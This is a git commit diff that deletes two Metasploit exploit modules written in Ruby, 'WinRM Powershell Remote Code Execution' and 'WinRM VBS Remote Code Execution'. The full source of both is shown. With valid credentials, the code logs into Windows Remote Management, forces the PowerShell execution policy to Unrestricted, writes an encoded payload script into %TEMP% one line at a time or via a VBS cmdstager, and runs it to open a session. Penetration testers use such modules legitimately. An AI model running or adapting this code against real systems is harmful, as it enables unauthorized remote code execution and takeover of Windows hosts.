Remove the older modules
parent
fca8208171
commit
25a6e983a1
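--- a/<path not shown on this page>
+++ /dev/null
@@ -1,177 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-Rank = ManualRanking
-
-include Msf::Exploit::Remote::WinRM
-
-
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'WinRM Powershell Remote Code Execution',
-'Description' => %q{
-This module uses valid credentials to login to the WinRM service
-and execute a payload as a powershell script. It then attempts to
-automigrate before the WinRS shell dies.
-
-It is important to use an x64 payload if your target system is x64.
-The target machine must be running Powershell 2.0 for the payload
-to work.
-},
-'Author' => [ 'thelightcosine' ],
-'License' => MSF_LICENSE,
-'Version' => '$Revision$',
-'Privileged' => true,
-'DefaultOptions' =>
-{
-'WfsDelay' => 30,
-'EXITFUNC' => 'thread',
-'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
-},
-'Platform' => 'win',
-'Arch' => [ ARCH_X86, ARCH_X86_64 ],
-'Targets' =>
-[
-[ 'Windows with Powershell 2.0', { } ],
-],
-'DefaultTarget' => 0,
-'DisclosureDate' => 'Nov 01 2012'
-))
-
-end
-
-def check
-unless accepts_ntlm_auth
-print_error "The Remote WinRM server does not appear to allow Negotiate(NTLM) auth"
-return Msf::Exploit::CheckCode::Safe
-end
-
-print_status "checking for Powershell 2.0"
-streams = winrm_run_cmd("powershell Get-Host")
-if streams == 401
-print_error "Login failed!"
-return Msf::Exploit::CheckCode::Safe
-end
-unless streams.class == Hash
-print_error "Recieved error while running check"
-return Msf::Exploit::CheckCode::Safe
-end
-streams['stdout'].each_line do |line|
-next unless line.start_with? "Version"
-major_version = line.match(/\d(?=\.)/)[0]
-if major_version == 1
-print_error "The target is running an older version of powershell"
-return Msf::Exploit::CheckCode::Safe
-end
-end
-
-print_status "Attempting to set Execution Policy"
-streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
-if streams == 401
-print_error "Login failed!"
-return Msf::Exploit::CheckCode::Safe
-end
-unless streams.class == Hash
-print_error "Recieved error while running check"
-return Msf::Exploit::CheckCode::Safe
-end
-streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
-if streams['stdout'].include? 'Unrestricted'
-return Msf::Exploit::CheckCode::Vulnerable
-else
-unless streams['stderr'] == ''
-print_error streams['stderr']
-end
-return Msf::Exploit::CheckCode::Safe
-end
-end
-
-def exploit
-unless check == Msf::Exploit::CheckCode::Vulnerable
-print_error "Unable to set Execution Policy"
-return
-end
-path = upload_script
-return if path.nil?
-exec_script(path)
-handler
-end
-
-def upload_script
-tdir = temp_dir
-return if tdir.nil?
-path = tdir + "\\" + ::Rex::Text.rand_text_alpha(8) + ".ps1"
-print_status "Uploading powershell script to #{path} (This may take a few minutes)..."
-
-script = Msf::Util::EXE.to_win32pe_psh(framework,payload.encoded)
-#add a sleep to the script to give us enoguh time to establish a session
-script << "\n Start-Sleep -s 600"
-script.each_line do |psline|
-#build our psh command to write out our psh script, meta eh?
-script_line = "Add-Content #{path} '#{psline.chomp}' "
-cmd = encoded_psh(script_line)
-streams = winrm_run_cmd(cmd)
-end
-return path
-end
-
-def exec_script(path)
-print_status "Attempting to execute script..."
-cmd = "powershell -File #{path}"
-resp,c = send_request_ntlm(winrm_open_shell_msg)
-if resp.nil?
-print_error "Got no reply from target"
-return
-end
-unless resp.code == 200
-print_error "Got unexpected response from #{ip}: \n #{resp.to_s}"
-return
-end
-shell_id = winrm_get_shell_id(resp)
-resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
-cmd_id = winrm_get_cmd_id(resp)
-resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
-streams = winrm_get_cmd_streams(resp)
-end
-
-def encoded_psh(script)
-script = script.chars.to_a.join("\x00").chomp
-script << "\x00" unless script[-1].eql? "\x00"
-script = Rex::Text.encode_base64(script).chomp
-cmd = "powershell -encodedCommand #{script}"
-end
-
-def temp_dir
-print_status "Grabbing %TEMP%"
-resp,c = send_request_ntlm(winrm_open_shell_msg)
-if resp.nil?
-print_error "Got no reply from the server"
-return nil
-end
-unless resp.code == 200
-print_error "Got unexpected response: \n #{resp.to_s}"
-return nil
-end
-shell_id = winrm_get_shell_id(resp)
-cmd = "echo %TEMP%"
-resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
-cmd_id = winrm_get_cmd_id(resp)
-resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
-streams = winrm_get_cmd_streams(resp)
-return streams['stdout'].chomp
-end
-
-end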
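--- a/<path not shown on this page>
+++ /dev/null
@@ -1,86 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
-##
-
-
-require 'msf/core'
-
-
-class Metasploit3 < Msf::Exploit::Remote
-Rank = ManualRanking
-
-include Msf::Exploit::Remote::WinRM
-include Msf::Exploit::CmdStagerVBS
-
-
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'WinRM VBS Remote Code Execution',
-'Description' => %q{
-This module uses valid credentials to login to the WinRM service
-and execute a VBS cmdstager.
-},
-'Author' => [ 'thelightcosine' ],
-'License' => MSF_LICENSE,
-'Version' => '$Revision$',
-'Privileged' => true,
-'DefaultOptions' =>
-{
-'WfsDelay' => 30,
-'EXITFUNC' => 'thread',
-'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
-},
-'Platform' => 'win',
-'Arch' => [ ARCH_X86, ARCH_X86_64 ],
-'Targets' =>
-[
-[ 'Windows', { } ],
-],
-'DefaultTarget' => 0,
-'DisclosureDate' => 'Nov 01 2012'
-))
-
-register_advanced_options(
-[
-OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
-File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")]),
-], self.class)
-
-end
-
-def check
-unless accepts_ntlm_auth
-print_error "The Remote WinRM server does not appear to allow Negotiate(NTLM) auth"
-return Msf::Exploit::CheckCode::Safe
-end
-end
-
-
-def exploit
-execute_cmdstager
-handler
-end
-
-def execute_command(cmd,opts)
-commands = cmd.split(/&/)
-commands.each do |command|
-if command.include? "cscript"
-streams = winrm_run_cmd_hanging(command)
-print_status streams.inspect
-elsif command.include? "del %TEMP%"
-next
-else
-winrm_run_cmd(command)
-end
-end
-end
-
-
-end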